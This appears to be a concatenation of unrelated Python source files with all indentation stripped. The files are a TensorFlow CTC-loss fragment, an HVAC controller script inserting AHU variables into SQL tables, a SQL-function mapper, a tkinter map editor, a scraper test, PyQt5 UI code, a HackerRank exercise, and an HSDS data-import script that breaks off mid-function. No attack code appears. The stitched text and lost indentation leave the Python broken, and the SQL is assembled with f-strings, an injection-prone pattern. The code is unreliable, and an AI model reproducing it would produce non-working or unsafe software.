tf.logging.info("*** time_major ***")
tf.logging.info(time_major)
tf.logging.info("*** y_pred ***")
tf.logging.info(y_pred)
tf.logging.info("*** input_length ***")
tf.logging.info(input_length)
tf.logging.info("*** label_length ***")
tf.logging.info(label_length)
print(indices, "===indices===")
if blank_index < 0:
blank_index += _get_dim(y_pred, 2)
tf.logging.info("** blank_index **")
tf.logging.info(blank_index)
if check_tf_version():
# indices = tf.nn.ctc_unique_labels(
# y_true, name=None
# )
tf.logging.info("** ctc_unique_labels **")
tf.logging.info(indices)
return tf.nn.ctc_loss_v2(
labels=y_true,
logits=y_pred,
label_length=label_length,
logit_length=input_length,
logits_time_major=time_major,
unique=indices,
blank_index=blank_index
)
else:
# indices = ctc_ops.ctc_unique_labels(
# y_true, name=None
# )
tf.logging.info("** ctc_unique_labels **")
tf.logging.info(indices)
return ctc_ops.ctc_loss_v2(
labels=y_true,
logit_length=input_length,
logits=y_pred,
label_length=label_length,
logits_time_major=time_major,
unique=indices,
blank_index=blank_index
) |
from deltaconnection import make_connection
from __variables_creation import Variables
import logging
class AhuVariables(Variables):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.points_list = []
self.setup_dict = {}
for key, value in kwargs.items():
if key == 'points_list':
self.points_list = value
elif key == 'setup_info':
self.setup_dict = value
else:
pass
self.analog_variables_list = [
"1,'Outside Air Temperature Transfer','°F'",
"2,'Outside Air Humidity Transfer','%RH'",
"3,'Outside Air Wetbulb Temperature Transfer','°F'",
"4,'Outside Air CO2 Transfer','ppm'",
"5,'Outside Air Enthalpy Transfer','BTU/lb'",
"6,'Return Air Enthalpy','BTU/lb'",
"21,'Supply Duct Static Pressure Setpoint','inWC'",
"22,'Supply Discharge High Limit Static Pressure Setpoint','inWC'",
"23,'Return Fan CFM Setpoint','CFM'",
"24,'Return Plenum Static Pressure Low Limit Setpoint','inWC'",
"25,'Building Static Pressure Setpoint','inWC'",
"26,'Mixed Air Plenum Static Pressure Low Limit Setpoint','inWC'",
"31,'Supply Air Heating Setpoint','°F'",
"32,'Supply Air Cooling Setpoint','°F'",
"33,'Return Air Temperature Setpoint','°F'",
"34,'Preheat Air Temperature Setpoint','°F'",
"35,'Mixed Air Temperature Setpoint','°F'",
"36,'Mixed Air Low Limit Temperature Setpoint','°F'",
"37,'Economizer Enable Setpoint','°F'",
"41,'Humidifier Enable Setpoint','%RH'",
"42,'Return Air Humidity Setpoint','%RH'",
"43,'Space Humidity Setpoint','%RH'",
"44,'Humidity High Limit Setpoint','%RH'",
"45,'Dehumidification Setpoint','%RH'",
"46,'Unoccupied Dehumidification Setpoint','%RH'",
"51,'Minimum Outside Air CFM Setpoint','CFM'",
"52,'Maximum Outside Air CFM Setpoint (CO2)','CFM'",
"53,'Minimum Outside Air CFM Setpoint (CO2)','CFM'",
"54,'Demand Ventilation CO2 Setpoint','ppm'",
"61,'Occupied Space Temperature Setpoint','°F'",
"62,'Active Space Heating Setpoint','°F'",
"63,'Active Space Cooling Setpoint','°F'",
"64,'Occupied Space Temperature Setpoint Deadband','°F'",
"71,'Unoccupied Heating Setpoint','°F'",
"72,'Unoccupied Cooling Setpoint','°F'",
"73,'Unoccupied Space Temperature Setpoint Deadband','°F'",
"77,'Average Space Temperature','°F'",
"78,'Lowest Space Temperature','°F'",
"79,'Highest Space Temperature','°F'",
"81,'Hot Water Runaround Pump Enable Setpoint','°F'",
"91,'Supply VFD Control Ramp','%'",
"92,'Return VFD Control Ramp','%'",
"93,'Damper Control Ramp','%'",
"94,'Valve Control Ramp','%'",
"95,'Fan Control Ramp','%'",
"96,'Humidifier Control Ramp','%'"
]
self.binary_variables_list = [
"1,'AHU Enable','BDC7'",
"2, 'AHU Fan Request', 'BDC5'",
"3, 'Afterhours Override', 'BDC5'",
"11, 'Hot Water Available', 'BDC5'",
"21, 'Mechanical Cooling Available', 'BDC5'",
"31, 'Economizer Mode Enable', 'BDC5'",
"32, 'CO2 Demand Ventilation Mode Enable', 'BDC5'",
"41, 'Humidifier Enable', 'BDC5'",
"42, 'Dehumidification Enable', 'BDC5'",
"51, 'Supply Fans Operational Status', 'BDC5'",
"52, 'Return Fans Operational Status', 'BDC5'"
]
self.multistate_variables_list = [
"1, 'AHU Mode', 'MIC21'",
"2, 'AHU Status', 'MIC22'"
]
self.mic_list = [
"'Controller Modes', 'MIC21'",
"'Controller Status', 'MIC22'"
]
self.mic_state_text_list = [
['MIC21', 1, 'Unoccupied', 21],
['MIC21', 2, 'Occupied', 21],
['MIC21', 3, 'Warmup', 21],
['MIC21', 4, 'Unoccupied Override', 21],
['MIC21', 5, 'Autozero', 21],
['MIC21', 6, 'Unoccupied Heat_Cool', 21],
['MIC21', 7, 'Unoccupied Dehumid', 21],
['MIC21', 8, 'Cooldown', 21],
['MIC21', 9, 'Airflow Calibration', 21],
['MIC22', 1, 'Heating', 22],
['MIC22', 2, 'Cooling', 22],
['MIC22', 3, 'Deadband', 22],
['MIC22', 4, 'Zero Calibration', 22],
['MIC22', 5, 'Smoke Evacuation', 22]
]
def create_analog_variables(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['analog_variables'] == 2:
for row in range(len(self.analog_variables_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_AV (DEV_ID, INSTANCE, Object_Name, Units, SITE_ID) " \
f"VALUES ({self.setup_dict['device_id']},{self.analog_variables_list[row]}," \
f"'{self.setup_dict['site_id']}') "
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t"
f"{self.setup_dict['device_id']}, AV{self.analog_variables_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create AV{self.analog_variables_list[row]}!!!!!")
else:
logger.info(f"Analog Variables were not selected for creation.")
def create_binary_variable(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['binary_variables'] == 2:
for row in range(len(self.binary_variables_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_BV (DEV_ID, INSTANCE, Object_Name, Type_Reference, SITE_ID) " \
f"VALUES ({self.setup_dict['device_id']},{self.binary_variables_list[row]}," \
f"'{self.setup_dict['site_id']}') "
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t"
f"{self.setup_dict['device_id']}, BV{self.binary_variables_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create BV{self.binary_variables_list[row]}!!!!!")
else:
logger.info(f"Binary Variables were not selected for creation.")
def create_multistate_variables(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['multistate_variables'] == 2:
for row in range(len(self.multistate_variables_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_MV (DEV_ID, INSTANCE,Object_Name, Type_Reference, SITE_ID) " \
f"VALUES ({self.setup_dict['device_id']},{self.multistate_variables_list[row]}," \
f"'{self.setup_dict['site_id']}') "
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t"
f"{self.setup_dict['device_id']}, MV{self.multistate_variables_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create MV{self.multistate_variables_list[row]}!!!!!")
else:
logger.info(f"Multistate Variables were not selected for creation.")
def create_mics(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['multistate_variables'] == 2:
for row in range(len(self.mic_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_MIC (DEV_ID, Object_Name, Object_Identifier, SITE_ID)" \
f"VALUES ({self.setup_dict['device_id']}, {self.mic_list[row]}, " \
f"'{self.setup_dict['site_id']}')"
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t{self.setup_dict['device_id']}, MIC{self.mic_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create MIC{self.mic_list[row]}!!!!!")
for row in range(len(self.mic_state_text_list)):
idx = self.mic_state_text_list[row][1]
state_text = self.mic_state_text_list[row][2]
mic_instance = self.mic_state_text_list[row][3]
try:
sql_statement = f"Insert Into ARRAY_V4_MIC_STATE_TEXT (DEV_ID, IDX, State_Text, INSTANCE, SITE_ID)" \
f"Values({self.setup_dict['device_id']}, {idx}, '{state_text}',{mic_instance}, " \
f"'{self.setup_dict['site_id']}')"
make_connection(sql_statement)
except:
pass
|
import keyword_maps
import re
import pandas as pd
keywords_map = keyword_maps.keywords_map
def map_function(str1):
all = str1
converted = {}
list_param = {}
for a in range(str1.count('(')):
func_parameters = {}
ptrn = "\s*([a-zA-Z_]\w*[(](\s*[a-zA-Z_]\w*[(]|[^()]+)[)])"
matches = re.findall(ptrn, str1)
if matches:
if 'from' in matches[0][1]:
list_param[matches[0][0]] = matches[0][1].replace(')','').split('from')
else:
list_param[matches[0][0]] = matches[0][1].replace(')', '').split(',')
i = 0
for val in list_param[matches[0][0]]:
i = i + 1
func_parameters[str(i)+"_"] = val
str1 = str1.replace(matches[0][0], '$x')
converted[matches[0][0].split('(')[0]] = func_parameters
# Convert arguments
for k, v in converted.items():
for key, args in v.items():
# print(key,args,keywords_map.keys())
if args in keywords_map.keys():
converted[k][key] = keywords_map[args]
# Convert keys
new_dict = {}
for k, v in converted.items():
keys = [k.split('(')[0] for k in keywords_map.keys()]
for key in keywords_map.keys():
if k in key.split('(')[0]:
new_dict[keywords_map[key]] = v
elif k not in keys:
st = []
if "from" in all:
strf = k+"("+str("from".join(v.keys())).replace("'","")+")"
else:
strf = k +"("+str(",".join(v.keys())).replace("'", "")+")"
new_dict[strf] = v
list_of_part = []
for k, v in new_dict.items():
for key, val in v.items():
k = k.replace(str(key), val)
list_of_part.append(k)
final = []
for i, e in list(enumerate(list_of_part)):
if len(final) < 1:
final.append(e)
else:
final.append(e.replace('$x', final[i - 1]))
if final:
return final[-1]
else:
return "Not Available"
def map_direct(direct_map):
df_direct_map = pd.DataFrame(list(direct_map.items()), columns=['SQL_Functions', 'Converted_Functions']).reset_index()
return df_direct_map
|
#! python3
import sys
import traceback
import os
import xml.etree.ElementTree as ET
from tkinter import *
import tkinter.filedialog
from modules.map_data_view import MapDataView
from modules.map_border_view import MapBorderView
from modules.map_view import MapView
from modules.utils import getGameDir
from modules.tilemap import Tilemap
class App():
def __init__(self, master):
self.master = master
self.fn = None
self.gameDir = None
self.master.wm_title("Ditto map editor")
self.menu = Menu(self.master)
self.master.config(menu=self.menu)
filemenu = Menu(self.menu)
self.menu.add_cascade(label="File", menu=filemenu)
filemenu.add_command(label="New", command=self.callback, accelerator="Ctrl+N")
filemenu.add_command(label="Open", command=self.menu_open, accelerator="Ctrl+O")
filemenu.add_command(label="Save", command=self.menu_save, accelerator="Ctrl+S")
filemenu.add_command(label="Save As", command=self.menu_saveas)
self.lhFrame = Frame(self.master)
self.lhFrame.pack(side=LEFT)
self.mapDataView = MapDataView(self.lhFrame)
self.mapDataView.pack(side=TOP, fill=X)
self.mapBorderView = MapBorderView(self.lhFrame)
self.mapBorderView.pack(side=TOP, fill=X)
self.mapView = MapView(self.master)
self.mapView.pack(side=RIGHT, fill=BOTH, expand=1)
self.master.bind_all("<Control-o>", self.menu_open)
self.master.bind_all("<Control-s>", self.menu_save)
def menu_open(self, *args):
self.fn = tkinter.filedialog.askopenfilename(initialdir=".", filetypes=(("XML files", ".xml"),))
if self.fn != "":
self.master.wm_title("Ditto map editor: {}".format(os.path.split(self.fn)[1]))
self.gameDir = getGameDir(self.fn)
if not self.gameDir:
raise ValueError
self.map = Tilemap(self.fn)
self.mapDataView.showData(self.fn)
self.mapBorderView.showData(self.fn, self.map)
self.mapView.showData(self.map)
def menu_save(self, *args):
root = ET.Element("map")
self.mapDataView.dumpOnto(root)
self.mapBorderView.dumpOnto(root)
self.mapView.dumpOnto(root)
tree = ET.ElementTree(root)
tree.write(self.fn)
def menu_saveas(self, *args):
saveFn = tkinter.filedialog.asksaveasfilename(initialdir=".", filetypes=(("XML files", ".xml"),), defaultextension=".xml")
if saveFn != "":
self.fn = saveFn
self.master.wm_title("Ditto map editor: {}".format(os.path.split(self.fn)[1]))
root = ET.Element("map")
self.mapDataView.dumpOnto(root)
self.mapBorderView.dumpOnto(root)
self.mapView.dumpOnto(root)
tree = ET.ElementTree(root)
tree.write(saveFn)
def callback(self, *args):
print("Callback")
if __name__ == "__main__":
try:
root = Tk()
myApp = App(root)
root.mainloop()
except Exception:
print("Python exception generated!")
print("-"*20)
traceback.print_exc(file=sys.stdout)
print("-"*20)
input()
|
import pytest
from tests.utils import file_response
from city_scrapers.spiders.det_schools import Det_schoolsSpider
test_response = file_response('files/det_schools.html', url='http://detroitk12.org/board/meetings/')
spider = Det_schoolsSpider()
parsed_items = [item for item in spider.parse(test_response) if isinstance(item, dict)]
# def test_id():
# assert parsed_items[0]['id'] == 'det_schools/201804170900/MmlhcTcyNW50Nm43dWZqN3BpOWwzYmF1ZzRfMjAxODA0MTdUMTMwMDAwWiA4bmpua21kbzgxcDdyZGw0MjA4dDI2MmM2b0Bn/policy_ad_hoc_sub_committee_meeting_open'
def test_name():
assert parsed_items[0]['name'] == 'Policy Ad-hoc Sub-Committee Meeting (Open)'
def test_description():
assert parsed_items[0]['description'] == 'Policy Ad-hoc Sub-Committee Meeting (Open)'
def test_start_time():
assert parsed_items[0]['start_time'].isoformat() == '2018-04-17T09:00:00'
def test_end_time():
assert parsed_items[0]['end_time'].isoformat() == '2018-04-17T10:30:00'
def test_location():
assert parsed_items[0]['location'] == {
'url': '',
'name': '',
'address': 'Fisher Building, 3011 W. Grand Boulevard, 12th Floor Conference Room',
'coordinates': {
'latitude': '',
'longitude': '',
},
}
def test_sources():
assert parsed_items[0]['sources'] == [{
'url': 'http://detroitk12.org/board/meetings/',
'note': ''
}]
##### PARAMETRIZED TESTS #####
@pytest.mark.parametrize('item', parsed_items)
def test_type(item):
assert parsed_items[0]['_type'] == 'event'
@pytest.mark.parametrize('item', parsed_items)
def test_classification(item):
assert item['classification'] == 'education'
@pytest.mark.parametrize('item', parsed_items)
def test_timezone(item):
assert item['timezone'] == 'America/Detroit'
@pytest.mark.parametrize('item', parsed_items)
def test_status(item):
assert item['status'] == 'tentative'
@pytest.mark.parametrize('item', parsed_items)
def test_all_day(item):
assert item['all_day'] is False
|
#!/usr/bin/env python
#-*- coding: UTF-8 -*-
import sys
import os
sys.path.append('/Users/dingyang/tim/extra/my/wall/Mac-command-wallpaper-master/bin')
from weather import address
from weather import city
from weather import fiveday
if __name__ == '__main__':
print(fiveday.getFives())
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'blochin.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(988, 873)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1121, 861))
self.tabWidget.setStyleSheet("QTabWidget::pane{border: 1px solid grey;background-image:url(云.jpg);}" + \
"QTabBar::tab{min-width:95px;min-height:45px;background:transparent;}" + \
"QTabBar::tab{font:9pt \"黑体\";}" + \
"QTabBar::tab:selected{color:white;background-color:rgb(0, 85, 127);}" + \
"QTabBar::tab:!selected{color: black;background:transparent;}")
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.tabWidget.addTab(self.tab_2, "")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(280, 60, 661, 511))
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.sentence_box = QtWidgets.QTextBrowser(self.groupBox)
self.sentence_box.setGeometry(QtCore.QRect(20, 20, 621, 311))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(11)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.sentence_box.setFont(font)
self.sentence_box.setReadOnly(False)
self.sentence_box.setObjectName("sentence_box")
self.keyword_box = QtWidgets.QTextBrowser(self.groupBox)
self.keyword_box.setGeometry(QtCore.QRect(20, 360, 621, 131))
self.keyword_box.setObjectName("keyword_box")
self.groupBox_1 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_1.setGeometry(QtCore.QRect(40, 370, 181, 121))
self.groupBox_1.setStyleSheet("font: 10pt \"黑体\";")
self.groupBox_1.setAlignment(QtCore.Qt.AlignCenter)
self.groupBox_1.setObjectName("groupBox_1")
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_2.setGeometry(QtCore.QRect(280, 600, 661, 221))
self.groupBox_2.setTitle("")
self.groupBox_2.setObjectName("groupBox_2")
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_3.setGeometry(QtCore.QRect(40, 510, 181, 281))
font = QtGui.QFont()
font.setFamily("黑体")
font.setPointSize(10)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.groupBox_3.setFont(font)
self.groupBox_3.setStyleSheet("font: 10pt \"黑体\";")
self.groupBox_3.setAlignment(QtCore.Qt.AlignCenter)
self.groupBox_3.setObjectName("groupBox_3")
self.mine_but = QtWidgets.QPushButton(self.groupBox_3)
self.mine_but.setGeometry(QtCore.QRect(40, 40, 101, 51))
font = QtGui.QFont()
font.setFamily("黑体")
font.setPointSize(9)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.mine_but.setFont(font)
self.mine_but.setStyleSheet("font: 9pt \"黑体\";\n"
"")
self.mine_but.setObjectName("mine_but")
self.add_but = QtWidgets.QPushButton(self.groupBox_3)
self.add_but.setGeometry(QtCore.QRect(40, 120, 101, 51))
font = QtGui.QFont()
font.setFamily("黑体")
font.setPointSize(9)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.add_but.setFont(font)
self.add_but.setStyleSheet("font: 9pt \"黑体\";")
self.add_but.setObjectName("add_but")
self.inquire_but = QtWidgets.QPushButton(self.groupBox_3)
self.inquire_but.setGeometry(QtCore.QRect(40, 200, 101, 51))
font = QtGui.QFont()
font.setFamily("黑体")
font.setPointSize(9)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.inquire_but.setFont(font)
self.inquire_but.setStyleSheet("font: 9pt \"黑体\";")
self.inquire_but.setObjectName("inquire_but")
self.status_label_3 = QtWidgets.QLabel(self.centralwidget)
self.status_label_3.setGeometry(QtCore.QRect(20, 810, 161, 16))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(9)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.status_label_3.setFont(font)
self.status_label_3.setStyleSheet("font: 9pt \"Arial\";")
self.status_label_3.setObjectName("status_label_3")
self.blockchain_box = QtWidgets.QTextBrowser(self.centralwidget)
self.blockchain_box.setGeometry(QtCore.QRect(300, 620, 621, 181))
self.blockchain_box.setObjectName("blockchain_box")
self.groupBox_4 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_4.setGeometry(QtCore.QRect(40, 70, 181, 281))
font = QtGui.QFont()
font.setFamily("黑体")
font.setPointSize(10)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.groupBox_4.setFont(font)
self.groupBox_4.setStyleSheet("font: 10pt \"黑体\";")
self.groupBox_4.setAlignment(QtCore.Qt.AlignCenter)
self.groupBox_4.setObjectName("groupBox_4")
self.start_but = QtWidgets.QPushButton(self.groupBox_4)
self.start_but.setGeometry(QtCore.QRect(40, 40, 101, 51))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(10)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.start_but.setFont(font)
self.start_but.setStyleSheet("font: 10pt \"Arial\";\n"
"")
self.start_but.setObjectName("start_but")
self.stop_but = QtWidgets.QPushButton(self.groupBox_4)
self.stop_but.setGeometry(QtCore.QRect(40, 120, 101, 51))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(10)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.stop_but.setFont(font)
self.stop_but.setStyleSheet("font: 10pt \"Arial\";")
self.stop_but.setObjectName("stop_but")
self.play_but = QtWidgets.QPushButton(self.groupBox_4)
self.play_but.setGeometry(QtCore.QRect(40, 200, 101, 51))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(10)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.play_but.setFont(font)
self.play_but.setStyleSheet("font: 10pt \"Arial\";")
self.play_but.setObjectName("play_but")
self.keyword_but = QtWidgets.QPushButton(self.centralwidget)
self.keyword_but.setGeometry(QtCore.QRect(80, 410, 101, 51))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(10)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.keyword_but.setFont(font)
self.keyword_but.setStyleSheet("font: 10pt \"Arial\";")
self.keyword_but.setObjectName("keyword_but")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 988, 18))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "讯飞接口"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "自主模型"))
self.sentence_box.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Arial\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'SimSun\'; font-size:12pt;\"><br /></p></body></html>"))
self.keyword_box.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'SimSun\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:12pt;\"><br /></p></body></html>"))
self.groupBox_1.setTitle(_translate("MainWindow", "关键词提取"))
self.groupBox_3.setTitle(_translate("MainWindow", "区块链"))
self.mine_but.setText(_translate("MainWindow", "挖矿"))
self.add_but.setText(_translate("MainWindow", "添加交易"))
self.inquire_but.setText(_translate("MainWindow", "查询信息"))
self.status_label_3.setText(_translate("MainWindow", "TextLabel"))
self.groupBox_4.setTitle(_translate("MainWindow", "实时语音转写"))
self.start_but.setText(_translate("MainWindow", "start"))
self.stop_but.setText(_translate("MainWindow", "stop"))
self.play_but.setText(_translate("MainWindow", "playback"))
self.keyword_but.setText(_translate("MainWindow", "keyword"))
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
if __name__ == '__main__':
app = QApplication(sys.argv)
MainWindow = QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_()) |
import sys
from PyQt5.QtWidgets import QDialog, QApplication, QGridLayout, QGroupBox, QPushButton, QLineEdit
#from PyQt5.QtWidgets import QLabel, QFileDialog, QRadioButton, QComboBox
class App(QDialog):
def __init__(self):
# Add fields here
super().__init__()
self.title = "Title"
self.left = 0
self.top = 0
self.width = 600
self.height = 100
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
windowLayout = QGridLayout()
self.config_settings()
windowLayout.addWidget(self.upper_left_section, 0, 0)
#windowLayout.addWidget(self.upper_right_section, 0, 1)
#windowLayout.addWidget(self.lower_left_section, 1, 0)
#windowLayout.addWidget(self.lower_right_section, 1, 1)
self.setLayout(windowLayout)
self.show()
def do_this(self):
return
def config_settings(self):
upper_left_layout = QGridLayout()
self.upper_left_section = QGroupBox("GroupBox 1")
self.upper_left_section.setLayout(upper_left_layout)
self.editedable_field = QLineEdit()
upper_left_layout.addWidget(self.editedable_field, 0, 1)
self.btn = QPushButton("Button 1")
self.btn.clicked.connect(self.do_this)
upper_left_layout.addWidget(self.btn, 0, 2)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
|
def print_formatted(number):
# your code goes here
binNumber = bin(number)[2:]
for i in range(1,number+1):
octalNum = oct(i)[2:]
hexNum = hex(i)[2:].upper()
binNum = bin(i)[2:]
print("{} {} {} {}".format(str(i).rjust(len(binNumber),' '),octalNum.rjust(len(binNumber),' '),hexNum.rjust(len(binNumber),' '),binNum.rjust(len(binNumber),' ')))
# oct(i)[2:].rjust(len(oct[number][2:]),' '),hex(i)[2:].rjust(len(hex(number),' ')),bin(i)[2:].rjust(len(bin(number)[2:]),' ')))
if __name__ == '__main__':
n = int(input())
print_formatted(n)
|
##############################################################################
# Copyright by The HDF Group. #
# All rights reserved. #
# #
# This file is part of HSDS (HDF5 Scalable Data Service), Libraries and #
# Utilities. The full HSDS copyright notice, including #
# terms governing use, modification, and redistribution, is contained in #
# the file COPYING, which can be found at the root of the source code #
# distribution tree. If you do not have access to this file, you may #
# request a copy from help@hdfgroup.org. #
##############################################################################
import sys
import signal
import random
import numpy as np
import time
import json
import asyncio
from aiohttp import ClientSession, TCPConnector, HttpProcessingError
import config
import hsds_logger as log
from helper import getRequestHeaders
globals = {}
def checkDockerLink():
# scan through /etc/hosts and see if any hsds links have been defined
linkfound = False
with open('/etc/hosts') as f:
lines = f.readlines()
for line in lines:
fields = line.split('\t')
if len(fields) < 2:
continue
host_name = fields[1]
if host_name.startswith("hsds_sn"):
linkfound = True
break
return linkfound
async def getEndpoints():
docker_machine_ip = config.get("docker_machine_ip")
req = "{}/nodestate/sn".format(config.get("head_endpoint"))
client = globals["client"]
globals["request_count"] += 1
async with client.get(req) as rsp:
if rsp.status == 200:
rsp_json = await rsp.json()
nodes = rsp_json["nodes"]
sn_endpoints = []
docker_links = checkDockerLink()
for node in nodes:
if not node["host"]:
continue
if docker_links:
# when running in docker, use the machine address as host
host = "hsds_sn_{}".format(node["node_number"])
elif docker_machine_ip:
host = docker_machine_ip
else:
host = node["host"]
url = "http://{}:{}".format(host, node["port"])
sn_endpoints.append(url)
log.info("{} endpoints".format(len(sn_endpoints)))
globals["sn_endpoints"] = sn_endpoints
def getEndpoint():
""" choose random endpoint from our list
"""
end_point = random.choice(globals["sn_endpoints"])
return end_point
def getFileList():
""" read text file that gives list of inputfiles and
add filenames to input_files global
"""
file_list = "filelist.txt"
if len(sys.argv) > 1 and sys.argv[1] in ("-h", "--help"):
print("usage: import_ghcn_files [filelist.txt]")
sys.exit()
if len(sys.argv) > 1:
file_list = sys.argv[1]
with open(file_list) as f:
content = f.readlines()
input_files = []
for line in content:
line = line.rstrip()
if line and not line.startswith('#'):
input_files.append(line)
globals["input_files"] = input_files
async def createGroup(parent_group, group_name):
""" create a new group and link it to the parent group with
link name of group name
"""
client = globals["client"]
domain = globals["domain"]
params = {"host": domain}
base_req = getEndpoint()
headers = getRequestHeaders()
timeout = config.get("timeout")
# TBD - replace with atomic create & link operation?
# create a new group
req = base_req + "/groups"
log.info("POST:" + req)
globals["request_count"] += 1
async with client.post(req, headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status != 201:
log.error("POST {} failed with status: {}, rsp: {}".format(req, rsp.status, str(rsp)))
raise HttpProcessingError(code=rsp.status, message="Unexpected error")
group_json = await rsp.json()
group_id = group_json["id"]
# link group to parent
req = base_req + "/groups/" + parent_group + "/links/" + group_name
data = {"id": group_id }
link_created = False
log.info("PUT " + req)
globals["request_count"] += 1
async with client.put(req, data=json.dumps(data), headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status == 409:
# another task has created this link already
log.warn("got 409 in request: " + req)
elif rsp.status != 201:
log.error("got http error: {} for request: {}, rsp: {}".format(rsp.status, req, rsp))
raise HttpProcessingError(code=rsp.status, message="Unexpected error")
else:
link_created = True
if not link_created:
# fetch the existing link and return the group
log.info("GET " + req)
globals["request_count"] += 1
async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status != 200:
log.warn("unexpected error (expected to find link) {} for request: {}".format(rsp.status, req))
raise HttpProcessingError(code=rsp.status, message="Unexpected error")
else:
rsp_json = await rsp.json()
link_json = rsp_json["link"]
if link_json["class"] != "H5L_TYPE_HARD":
raise ValueError("Unexpected Link type: {}".format(link_json))
group_id = link_json["id"]
return group_id
async def verifyGroupPath(h5path):
""" create any groups along the path that doesn't exist
"""
#print("current task: ", asyncio.Task.current_task())
client = globals["client"]
domain = globals["domain"]
